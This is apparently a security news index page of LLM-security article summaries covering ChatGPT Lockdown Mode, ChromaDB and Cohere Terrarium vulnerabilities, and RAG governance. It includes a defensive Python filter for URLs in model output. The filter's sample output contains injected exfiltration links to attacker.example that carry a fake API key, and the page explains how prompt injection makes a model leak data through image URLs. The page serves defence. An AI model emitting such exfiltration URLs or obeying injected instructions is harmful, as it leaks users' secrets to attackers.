// #llm-security

5 articles

🔑 IAM

Enterprise AI Tool Governance: Controlling Access, Data Flows, and Shadow AI Risk

The rollout of ChatGPT Lockdown Mode highlights the broader challenge of governing AI tool access in enterprise environments: organisations must balance productivity benefits against data loss risk, prompt-injection exposure, and the proliferation of unofficial AI tools used without IT oversight. This guide covers the IAM and DLP controls that define an enterprise AI governance posture.

#ai-governance +7
⚖️ Risk Mgmt

OpenAI Rolls Out ChatGPT Lockdown Mode to Block Prompt-Injection Data Exfiltration

OpenAI has released ChatGPT Lockdown Mode, a security configuration that prevents ChatGPT from loading external URLs, rendering images from arbitrary sources, or executing third-party plugin calls — the primary vectors for prompt-injection attacks that cause ChatGPT to exfiltrate data to attacker-controlled endpoints. Enterprise and education customers can now enforce Lockdown Mode organisation-wide via the admin console.

#openai +7
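The exfiltration channel described above, as an added illustration written for this page (not OpenAI's Lockdown Mode code): a render-side filter that refuses to fetch images or follow links whose host is not on an explicit allowlist, which is the generic form of "do not render images from arbitrary sources". The allowlisted host `docs.example-corp.internal`, the `attacker.example` and `evil.example` URLs, and the sample model output are all constructed for the example.

```python
"""Render-side allowlist for URLs in LLM output (added example, not OpenAI code).

A prompt injected through retrieved content can make the model emit a markdown
image whose URL carries conversation data in its query string. If the client
renders the image, the browser fetches it and the data leaves with the request.
Refusing to fetch or link anywhere but an explicit allowlist closes that channel.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Hypothetical: the only host this deployment lets rendered content talk to.
ALLOWED_HOSTS = frozenset({"docs.example-corp.internal"})

# Inline markdown links/images: optional "!", [label], (dest "optional title").
_MD_LINK = re.compile(r"""(!?)\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)""")
# Raw HTML image tags, in case the client renders HTML passed through by the model.
_HTML_IMG = re.compile(r"""<img\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)["']?[^>]*>""", re.I)


@dataclass
class ScanResult:
    text: str                                    # output safe to hand to the renderer
    blocked: list = field(default_factory=list)  # destinations that were removed


def host_allowed(url, allowed_hosts=ALLOWED_HOSTS):
    """True only for same-origin relative URLs or http(s) to an allowlisted host.

    Exact hostname comparison defeats suffix tricks such as
    allowed.host.attacker.example and userinfo tricks such as
    https://allowed.host@attacker.example/ (hostname is attacker.example).
    """
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return False
    if not parts.scheme and not parts.netloc:
        return True                      # relative: can only hit the serving origin
    if parts.scheme not in ("http", "https"):
        return False                     # data:, javascript:, file: and friends
    return parts.hostname is not None and parts.hostname in allowed_hosts


def carries_payload(url):
    """Heuristic for what to alert on: a blocked URL with a query or fragment."""
    parts = urlsplit(url)
    return bool(parts.query or parts.fragment)


def sanitize_output(text, allowed_hosts=ALLOWED_HOSTS):
    """Strip non-allowlisted destinations from markdown/HTML before rendering."""
    blocked = []

    def md_repl(m):
        is_image, label, dest = m.group(1) == "!", m.group(2), m.group(3)
        if host_allowed(dest, allowed_hosts):
            return m.group(0)
        blocked.append(dest)
        # Keep the visible text, drop the destination: nothing gets fetched.
        return f"[image removed: {label}]" if is_image else label

    def img_repl(m):
        dest = m.group(1)
        if host_allowed(dest, allowed_hosts):
            return m.group(0)
        blocked.append(dest)
        return "[image removed]"

    out = _MD_LINK.sub(md_repl, text)
    out = _HTML_IMG.sub(img_repl, out)
    return ScanResult(out, blocked)


# Constructed sample of model output after a successful injection.
SAMPLE_OUTPUT = (
    "Here is the summary you asked for.\n\n"
    "![loading](https://attacker.example/px.gif?c=API_KEY%3Dsk-live-1234)\n"
    "See the [policy](https://docs.example-corp.internal/policy) and [home](/dashboard).\n"
    "[docs](https://docs.example-corp.internal.evil.example/x)\n"
    '<img src="https://attacker.example/a.png?d=secret">\n'
    "[more](data:text/html;base64,PHNjcmlwdD4=)"
)

if __name__ == "__main__":
    result = sanitize_output(SAMPLE_OUTPUT)
    print(result.text)
    for url in result.blocked:
        print("blocked", "(payload)" if carries_payload(url) else "", url)
```

The filter belongs on the rendering side, not in the prompt: the model can be talked into emitting anything, so the only reliable control is that the client never issues a request the operator has not pre-approved. Blocked URLs that carry a query string are the ones worth alerting on, since that is where exfiltrated data rides.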
💻 AppSec

ChromaDB CVSS 10.0 Pre-Auth RCE CVE-2026-45829: AI Vector Database Compromise via HuggingFace Model Injection

HiddenLayer and the Cloud Security Alliance published disclosures of CVE-2026-45829, a CVSS 10.0 unauthenticated remote code execution vulnerability in ChromaDB's Python FastAPI server, on 18–20 May 2026. Attackers can inject malicious code via a crafted HuggingFace-hosted model before the authentication gate fires. Approximately 73% of ChromaDB deployments are internet-exposed. No patch exists for affected versions.

#chromadb +7
🏛️ Architecture

Securing RAG Pipeline Architecture: Vector Databases Are the New Unmanaged Attack Surface in Enterprise AI

The ChromaDB CVE-2026-45829 disclosure exposes a systemic architectural gap in enterprise AI deployments: vector databases used in retrieval-augmented generation pipelines are being deployed without the security controls applied to comparable databases handling sensitive data. The attack surface analysis and architectural recommendations for secure RAG pipeline design apply regardless of which vector database product is in use.

#rag-pipeline +6
💻 AppSec

Cohere Terrarium AI Sandbox Escape — CVSS 9.3 WebAssembly Flaw Allows Root Code Execution on Host

CVE-2026-5752 (CVSS 9.3) in Cohere Terrarium allows an attacker to escape the Pyodide WebAssembly sandbox via JavaScript prototype chain traversal, achieving root code execution on the host Node.js process. Organisations running AI code execution environments should patch immediately and network-isolate these workloads.

#ai-security +6